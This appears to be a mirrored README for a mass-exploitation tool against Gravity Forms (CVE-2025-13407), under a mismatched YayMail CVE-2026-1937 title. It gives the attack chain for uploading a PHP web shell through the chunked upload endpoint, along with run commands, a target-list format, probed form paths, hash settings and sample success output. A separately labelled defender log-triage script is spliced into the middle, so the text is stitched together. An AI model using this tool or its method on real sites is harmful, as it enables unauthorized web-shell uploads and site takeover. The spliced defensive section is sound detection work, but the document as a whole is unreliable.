## https://sploitus.com/exploit?id=D3A2217C-DCF2-5A65-A0E0-27206B8A2B1D
# CVE-2026-1937
YayMail <= 4.3.2 - Missing Authorization to Authenticated (Shop Manager+) Arbitrary Options Update via 'yaymail_import_state' AJAX Action
---
## Vulnerabilities Overview
---
### CVE-2025-13407 - Gravity Forms Unauthenticated Chunked File Upload (RCE)
| Field | Details |
|---|---|
| **CVE ID** | CVE-2025-13407 |
| **Severity** | **CRITICAL** |
| **Affected Software** | Gravity Forms Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Arbitrary File Upload → Remote Code Execution |
| **Authentication Required** | **None** |
| **Affected Component** | `gf_page=upload` chunked upload endpoint |
| **CWE** | CWE-434: Unrestricted Upload of File with Dangerous Type |
**Description:**
Gravity Forms exposes a legacy chunked upload endpoint (`?gf_page=upload`) that processes multi-part file uploads for multi-file upload form fields. The endpoint lacks proper server-side file type validation and authentication checks, allowing a remote, unauthenticated attacker to upload arbitrary files, including PHP web shells, directly to the server's `wp-content/uploads/gravity_forms/-/tmp/` directory. Successful exploitation results in **Remote Code Execution (RCE)** in the web server's process context. The attacker can discover the upload path by brute-forcing or computing the WordPress hash suffix associated with the form ID.
---
### CVE-2026-1937 - YayMail WooCommerce Email Customizer Privilege Escalation
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-1937 |
| **Severity** | **HIGH** |
| **Affected Software** | YayMail - WooCommerce Email Customizer Plugin for WordPress |
| **Affected Versions** | All versions up to and including **4.3.2** |
| **Vulnerability Type** | Missing Capability Check → Unauthorized Option Update → Privilege Escalation |
| **Authentication Required** | Yes - **Shop Manager** level or above |
| **CWE** | CWE-862: Missing Authorization |
**Description:**
The **YayMail - WooCommerce Email Customizer** plugin for WordPress is vulnerable to **unauthorized modification of data leading to Privilege Escalation** in all versions up to and including **4.3.2**. The `yaymail_import_state` AJAX action handler is registered without any capability check, so authenticated attackers with **Shop Manager-level access** or above can invoke it freely. By submitting a crafted AJAX request, the attacker can update arbitrary WordPress site options, including setting the **default user registration role to `administrator`** and **enabling open user registration**, effectively turning the public registration page into an administrator account factory. Any visitor can then register and receive a full WordPress admin account.
---
## Tool Description - CVE-2025-13407
This PoC script performs a **mass exploitation scan** of WordPress sites running vulnerable versions of **Gravity Forms** by:
1. Crawling a list of candidate page paths known to host Gravity Forms
2. Detecting pages containing `.gform_fileupload_multifile` widgets
3. Extracting `form_id`, `field_id`, and `gform_unique_id` from the HTML
4. Uploading a PHP web shell via the two-step chunked upload protocol
5. Reporting the full temp path (if `wp_hash(form_id)` is known) or the raw upload metadata
### Attack Chain
```
[Discovery]
GET // → Detect .gform_fileupload_multifile
Extract: form_id, field_id, gform_unique_id
↓
[Chunk 1 Upload]
POST /?gf_page=upload
file=nxploited.php | chunk=0 | chunks=2
← Receive: hash + temp_filename
↓
[Chunk 2 Upload]
POST /?gf_page=upload
file=image.jpg | chunk=1 | chunks=2
Pass: hash + temp_filename from Chunk 1
← Receive: final temp_filename
↓
[Result]
Temp shell path:
/wp-content/uploads/gravity_forms/-/tmp/
↓
[Log to gravity_mass_success.txt]
```
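For defenders, the two findings above translate into concrete things to look for: repeated `POST /?gf_page=upload` requests followed by a request for a `.php` file under the plugin's per-form `tmp/` directory (CVE-2025-13407), and a site whose `users_can_register` and `default_role` options have been flipped to the state described for CVE-2026-1937. The following triage helper is an added example, not part of this tool or of either plugin; the log lines are constructed, and `2-abc` stands in for the real `<form_id>-<hash>` directory name.

```python
import re
from collections import Counter

# Constructed sample lines in Apache combined-log format (not real traffic):
# two chunk POSTs to the legacy upload endpoint, then a fetch of a .php file
# from the gravity_forms temp directory ("2-abc" is a placeholder dir name).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2026:12:00:01 +0000] "POST /?gf_page=upload HTTP/1.1" 200 187 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2026:12:00:02 +0000] "POST /?gf_page=upload HTTP/1.1" 200 190 "-" "python-requests/2.31"
198.51.100.7 - - [10/Mar/2026:12:00:05 +0000] "GET /contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2026:12:00:09 +0000] "GET /wp-content/uploads/gravity_forms/2-abc/tmp/nxploited.php HTTP/1.1" 200 12 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any .php requested from the plugin's per-form temp directory is a red flag,
# whatever the status code: a 404 still shows someone probing for a shell.
TMP_PHP_RE = re.compile(r"/wp-content/uploads/gravity_forms/[^/]+/tmp/[^/?]+\.php", re.I)


def flag_gravity_upload_abuse(log_text):
    """Return (POSTs to gf_page=upload per source IP, [(ip, path, status)] for tmp .php hits)."""
    uploads = Counter()
    php_hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        if method == "POST" and "gf_page=upload" in path:
            uploads[ip] += 1
        elif TMP_PHP_RE.search(path):
            php_hits.append((ip, path, status))
    return uploads, php_hits


def audit_registration_options(options):
    """Flag the post-exploitation state CVE-2026-1937 produces: open registration
    plus an administrator default role. `options` maps WordPress option name -> value."""
    findings = []
    if str(options.get("users_can_register", "0")) == "1":
        findings.append("users_can_register is enabled")
    if options.get("default_role") == "administrator":
        findings.append("default_role is administrator")
    return findings


if __name__ == "__main__":
    per_ip, hits = flag_gravity_upload_abuse(SAMPLE_LOG)
    print(dict(per_ip), hits)
    print(audit_registration_options({"users_can_register": "1", "default_role": "administrator"}))
```

A single IP issuing two upload POSTs and then requesting a `.php` file from a `tmp/` directory is exactly the sequence the attack chain above produces; on the YayMail side, the option audit can be run against a `wp option` export after any Shop Manager session you did not expect.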
---
## Requirements
### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS
### Python Dependencies
```bash
pip install requests urllib3 beautifulsoup4 rich
```
Or via requirements file:
```bash
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
beautifulsoup4>=4.12.0
rich>=13.0.0
```
---
## Installation
```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2025-13407.git
cd CVE-2025-13407
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2025-13407.py
```
---
## Usage
### Basic Run
```bash
python3 CVE-2025-13407.py
```
The tool uses a fully interactive terminal interface powered by **Rich**.
---
### Target List Format
Create a plain text file (default: `list.txt`) with one target per line:
```
https://target1.com
https://target2.com
http://target3.com
target4.com
```
> Targets without `http://` or `https://` are automatically prefixed with `http://`.
---
### Interactive Prompts
```
Targets file (one host per line) (default: list.txt): list.txt
Threads (default: 5): 10
```
---
### Known Hashes - Full URL Resolution
If you know the `wp_hash(form_id)` for a specific form (e.g., via source code access or prior reconnaissance), add it to `KNOWN_HASHES` in the script for full upload URL resolution:
```python
KNOWN_HASHES = {
    "1": "651bc17dc2385aec9f37e1b3c96c0234",
    "3": "a3f2b9c1d7e4f0ab123456789abcdef0",
}
```
| Scenario | Result |
|---|---|
| Hash **known** | Full URL: `https://target.com/wp-content/uploads/gravity_forms/1-651bc.../tmp/nxploited.php` |
| Hash **unknown** | Metadata logged: `target \| page=... \| form_id=... \| temp_filename=...` |
---
## Candidate Pages Scanned
The tool automatically probes the following paths on each target (in priority order):
| Category | Paths |
|---|---|
| **Priority** | `/nx_p`, `/nx-p`, `/upload`, `/form`, `/forms`, `/home`, `/contact`, `/contact-us` |
| **Gravity Forms Templates** | `/Gravity-Forms-Upload`, `/Simple-Contact-Form`, `/Advanced-Contact-Form` |
| **WooCommerce Forms** | `/eCommerce-Form`, `/Stripe-Checkout-Form`, `/PayPal-Checkout-Form` |
| **Registration Forms** | `/User-Registration-Form`, `/Event-Registration-Form`, `/Webinar-Registration-Form` |
| **Other Templates** | `/Donation-Form`, `/Survey-Form`, `/Newsletter-Signup-Form`, `/Request-a-Quote-Form` |
---
## Uploaded Shell Content
The tool uploads the following static PHP payload:
```php
```
> The file is uploaded as `nxploited.php` via the chunked upload protocol using filename obfuscation (`nxploited.php!`).
---
## Output Files
| File | Description |
|---|---|
| `gravity_mass_success.txt` | All successful temp upload paths / metadata |
### Output Format
**With known hash:**
```
https://target.com/wp-content/uploads/gravity_forms/1-651bc17dc2385aec9f37e1b3c96c0234/tmp/nxploited.php
```
**Without known hash:**
```
https://target.com | page=https://target.com/contact | form_id=1 | temp_filename=nxploited.php
```
---
## Terminal Output Sample
```
╭──────────────────────────────────────────────────────────╮
│ CVE-2025-13407 | Gravity Forms Mass Exploit              │
│ By: Nxploited | GitHub: github.com/Nxploited             │
╰──────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────╮
│ Target: https://target.com                               │
│ Pages: 32                                                │
╰──────────────────────────────────────────────────────────╯
[VULN] Multi-file upload at https://target.com/contact
       (form_id=2, field_id=5, gform_unique_id=abc123)
╭─ UPLOAD SUCCESS ─────────────────────────────────────────╮
│ https://target.com/wp-content/uploads/gravity_forms/     │
│ 2-/tmp/nxploited.php                                     │
╰──────────────────────────────────────────────────────────╯
```
---
## Status Reference
| Message | Meaning |
|---|---|
| `UPLOAD SUCCESS` | Both chunks accepted; temp file written to disk |
| `No exploitable multi-file form found` | No `.gform_fileupload_multifile` widget detected on any scanned page |
| `First chunk missing fields` | Endpoint responded but JSON structure unexpected |
| `Second chunk missing temp_filename` | First chunk succeeded but second chunk response malformed |
| `Request error` | Network/timeout error on page fetch |
---
## Contact & Author
By: Nxploited (Khaled Alenazi)
---
## Legal Disclaimer
> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.
---
© 2026 Nxploited (Khaled Alenazi) - For authorized security research only.